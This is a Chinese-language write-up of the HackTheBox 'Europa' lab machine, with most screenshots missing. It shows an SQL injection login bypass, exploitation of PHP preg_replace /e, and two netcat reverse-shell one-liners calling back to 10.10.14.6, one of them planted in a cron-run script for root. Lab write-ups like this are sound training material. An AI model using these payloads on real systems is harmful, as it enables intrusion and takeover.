oscp——htb——Europa

0x00 前言

oscp——htb——Europa_第1张图片

0x01 信息收集

oscp——htb——Europa_第2张图片
这里访问之后看到默认页面,按照htb,就是要绑域名,vul就扫目录
oscp——htb——Europa_第3张图片

0x02 Web——Webshell

访问admin-portal.europacorp.htb
oscp——htb——Europa_第4张图片
这里搜了一下没啥漏洞,一般这种都是万能密码进去

[email protected]' or '1'='1

进入后台
oscp——htb——Europa_第5张图片

这里看到一个设置,涉及到一个php的preg_replace的漏洞,就是说正则表达式包含/e的时候就可以进行命令执行

oscp——htb——Europa_第6张图片
反弹shell,注意编码,我这里直接弹/bin/bash就不需要去获取pty

rm+/tmp/f%3b+mkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc++10.10.14.6+1234+>/tmp/f

在这里插入图片描述

0x03 Webshell——Rootshell

这里用探测脚本可以看到有计划任务
oscp——htb——Europa_第7张图片
看一看这个文件
oscp——htb——Europa_第8张图片
接着跟踪到/var/www/cmd/logcleared.sh

发现不存在,那我们自己构造

echo "rm /tmp/f; mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc  10.10.14.6 4321 >/tmp/f" >logcleared.sh 
chmod 777 logcleared.sh

过一会儿就会拿到一个shell
oscp——htb——Europa_第9张图片

你可能感兴趣的:(oscp)